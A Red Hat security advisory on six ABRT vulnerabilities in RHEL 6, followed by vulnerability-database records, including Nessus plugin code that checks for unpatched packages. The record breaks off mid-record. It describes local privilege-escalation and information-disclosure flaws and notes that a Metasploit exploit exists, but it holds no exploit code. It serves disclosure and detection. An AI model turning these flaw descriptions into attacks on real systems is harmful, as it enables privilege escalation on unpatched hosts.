ABRT (Automatic Bug Reporting Tool) is a tool to help users to detect
defects in applications and to create a bug report with all the information
needed by a maintainer to fix it. It uses a plug-in system to extend its
functionality.
It was found that ABRT was vulnerable to multiple race condition and
symbolic link flaws. A local attacker could use these flaws to potentially
escalate their privileges on the system. (CVE-2015-3315)
It was discovered that the kernel-invoked coredump processor provided by
ABRT wrote core dumps to files owned by other system users. This could
result in information disclosure if an application crashed while its
current directory was a directory writable to by other users (such as
/tmp). (CVE-2015-3142)
It was discovered that the default event handling scripts installed by ABRT
did not handle symbolic links correctly. A local attacker with write access
to an ABRT problem directory could use this flaw to escalate their
privileges. (CVE-2015-1869)
It was found that the ABRT event scripts created a user-readable copy of an
sosreport file in ABRT problem directories, and included excerpts of
/var/log/messages selected by the user-controlled process name, leading to
an information disclosure. (CVE-2015-1870)
It was discovered that, when moving problem reports between certain
directories, abrt-handle-upload did not verify that the new problem
directory had appropriate permissions and did not contain symbolic links.
An attacker able to create a crafted problem report could use this flaw to
expose other parts of ABRT, or to overwrite arbitrary files on the system.
(CVE-2015-3147)
It was discovered that the abrt-action-install-debuginfo-to-abrt-cache
helper program did not properly filter the process environment before
invoking abrt-action-install-debuginfo. A local attacker could use this
flaw to escalate their privileges on the system. (CVE-2015-3159)
The CVE-2015-1869, CVE-2015-1870, CVE-2015-3142, CVE-2015-3147, and
CVE-2015-3159 issues were discovered by Florian Weimer of Red Hat
Product Security.
All users of abrt are advised to upgrade to these updated packages, which
correct these issues.
{"nessus": [{"lastseen": "2023-01-11T14:59:14", "description": "Updated abrt packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect defects in applications and to create a bug report with all the information needed by a maintainer to fix it. It uses a plug-in system to extend its functionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and symbolic link flaws. A local attacker could use these flaws to potentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by ABRT wrote core dumps to files owned by other system users. This could result in information disclosure if an application crashed while its current directory was a directory writable to by other users (such as /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT did not handle symbolic links correctly. A local attacker with write access to an ABRT problem directory could use this flaw to escalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an sosreport file in ABRT problem directories, and included excerpts of /var/log/messages selected by the user-controlled process name, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain directories, abrt-handle-upload did not verify that the new problem directory had appropriate permissions and did not contain symbolic links. An attacker able to create a crafted problem report could use this flaw to expose other parts of ABRT, or to overwrite arbitrary files on the system. (CVE-2015-3147)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache helper program did not properly filter the process environment before invoking abrt-action-install-debuginfo. A local attacker could use this flaw to escalate their privileges on the system. (CVE-2015-3159)\n\nThe CVE-2015-1869, CVE-2015-1870, CVE-2015-3142, CVE-2015-3147, and CVE-2015-3159 issues were discovered by Florian Weimer of Red Hat Product Security.\n\nAll users of abrt are advised to upgrade to these updated packages, which correct these issues.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-07-08T00:00:00", "type": "nessus", "title": "RHEL 6 : abrt (RHSA-2015:1210)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:abrt", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-ccpp", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-kerneloops", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-python", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-vmcore", "p-cpe:/a:redhat:enterprise_linux:abrt-cli", "p-cpe:/a:redhat:enterprise_linux:abrt-console-notification", "p-cpe:/a:redhat:enterprise_linux:abrt-debuginfo", "p-cpe:/a:redhat:enterprise_linux:abrt-desktop", "p-cpe:/a:redhat:enterprise_linux:abrt-devel", "p-cpe:/a:redhat:enterprise_linux:abrt-gui", "p-cpe:/a:redhat:enterprise_linux:abrt-libs", "p-cpe:/a:redhat:enterprise_linux:abrt-python", "p-cpe:/a:redhat:enterprise_linux:abrt-tui", "p-cpe:/a:redhat:enterprise_linux:libreport", "p-cpe:/a:redhat:enterprise_linux:libreport-cli", "p-cpe:/a:redhat:enterprise_linux:libreport-compat", "p-cpe:/a:redhat:enterprise_linux:libreport-debuginfo", "p-cpe:/a:redhat:enterprise_linux:libreport-devel", "p-cpe:/a:redhat:enterprise_linux:libreport-filesystem", "p-cpe:/a:redhat:enterprise_linux:libreport-gtk", "p-cpe:/a:redhat:enterprise_linux:libreport-gtk-devel", "p-cpe:/a:redhat:enterprise_linux:libreport-newt", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-bugzilla", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-kerneloops", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-logger", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-mailx", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-reportuploader", "p-cpe:/a:redhat:enterprise_linux:libreport-plugin-rhtsupport", "p-cpe:/a:redhat:enterprise_linux:libreport-python", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.6"], "id": "REDHAT-RHSA-2015-1210.NASL", "href": "https://www.tenable.com/plugins/nessus/84609", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1210. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84609);\n script_version(\"2.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/02/05\");\n\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_bugtraq_id(75116, 75117, 75118, 75119, 75128, 75129);\n script_xref(name:\"RHSA\", value:\"2015:1210\");\n\n script_name(english:\"RHEL 6 : abrt (RHSA-2015:1210)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Updated abrt packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 6.\n\nRed Hat Product Security has rated this update as having Moderate\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect\ndefects in applications and to create a bug report with all the\ninformation needed by a maintainer to fix it. It uses a plug-in system\nto extend its functionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and\nsymbolic link flaws. A local attacker could use these flaws to\npotentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided\nby ABRT wrote core dumps to files owned by other system users. This\ncould result in information disclosure if an application crashed while\nits current directory was a directory writable to by other users (such\nas /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by\nABRT did not handle symbolic links correctly. A local attacker with\nwrite access to an ABRT problem directory could use this flaw to\nescalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy\nof an sosreport file in ABRT problem directories, and included\nexcerpts of /var/log/messages selected by the user-controlled process\nname, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain\ndirectories, abrt-handle-upload did not verify that the new problem\ndirectory had appropriate permissions and did not contain symbolic\nlinks. An attacker able to create a crafted problem report could use\nthis flaw to expose other parts of ABRT, or to overwrite arbitrary\nfiles on the system. (CVE-2015-3147)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache\nhelper program did not properly filter the process environment before\ninvoking abrt-action-install-debuginfo. A local attacker could use\nthis flaw to escalate their privileges on the system. (CVE-2015-3159)\n\nThe CVE-2015-1869, CVE-2015-1870, CVE-2015-3142, CVE-2015-3147, and\nCVE-2015-3159 issues were discovered by Florian Weimer of Red Hat\nProduct Security.\n\nAll users of abrt are advised to upgrade to these updated packages,\nwhich correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2015:1210\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3315\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1870\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3142\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-1869\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3147\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-3159\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:X/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ABRT raceabrt Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-ccpp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-addon-vmcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-console-notification\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:abrt-tui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-gtk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-newt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-logger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-mailx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-reportuploader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-plugin-rhtsupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:libreport-python\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:1210\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"abrt-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"abrt-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"abrt-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"abrt-addon-ccpp-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"abrt-addon-ccpp-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"abrt-addon-ccpp-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"abrt-addon-kerneloops-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"abrt-addon-kerneloops-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"abrt-addon-kerneloops-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"abrt-addon-python-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"abrt-addon-python-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"abrt-addon-python-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"abrt-addon-vmcore-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"abrt-addon-vmcore-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"abrt-addon-vmcore-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"abrt-cli-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"abrt-cli-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"abrt-cli-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"abrt-console-notification-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"abrt-console-notification-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"abrt-console-notification-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"abrt-debuginfo-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"abrt-desktop-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"abrt-desktop-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"abrt-desktop-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"abrt-devel-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"abrt-gui-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"abrt-gui-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"abrt-gui-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"abrt-libs-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"abrt-python-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"abrt-tui-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"abrt-tui-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"abrt-tui-2.0.8-26.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"libreport-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-cli-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-cli-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-cli-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-compat-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-compat-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-compat-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"libreport-debuginfo-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"libreport-devel-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-filesystem-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-filesystem-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-filesystem-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"libreport-gtk-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", reference:\"libreport-gtk-devel-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-newt-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-newt-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-newt-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-plugin-bugzilla-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-plugin-bugzilla-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-plugin-bugzilla-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-plugin-kerneloops-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-plugin-kerneloops-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-plugin-kerneloops-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-plugin-logger-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-plugin-logger-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-plugin-logger-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-plugin-mailx-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-plugin-mailx-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-plugin-mailx-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-plugin-reportuploader-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-plugin-reportuploader-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-plugin-reportuploader-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-plugin-rhtsupport-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-plugin-rhtsupport-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-plugin-rhtsupport-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"libreport-python-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"s390x\", reference:\"libreport-python-2.0.9-21.el6_6.1\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"libreport-python-2.0.9-21.el6_6.1\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrt / abrt-addon-ccpp / abrt-addon-kerneloops / abrt-addon-python / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:59:04", "description": "It was found that ABRT was vulnerable to multiple race condition and symbolic link flaws. A local attacker could use these flaws to potentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by ABRT wrote core dumps to files owned by other system users. This could result in information disclosure if an application crashed while its current directory was a directory writable to by other users (such as /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT did not handle symbolic links correctly. A local attacker with write access to an ABRT problem directory could use this flaw to escalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an sosreport file in ABRT problem directories, and included excerpts of /var/log/messages selected by the user-controlled process name, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain directories, abrt-handle-upload did not verify that the new problem directory had appropriate permissions and did not contain symbolic links. An attacker able to create a crafted problem report could use this flaw to expose other parts of ABRT, or to overwrite arbitrary files on the system. (CVE-2015-3147)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache helper program did not properly filter the process environment before invoking abrt-action-install-debuginfo. A local attacker could use this flaw to escalate their privileges on the system. (CVE-2015-3159)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-07-08T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : abrt on SL6.x i386/x86_64 (20150707)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 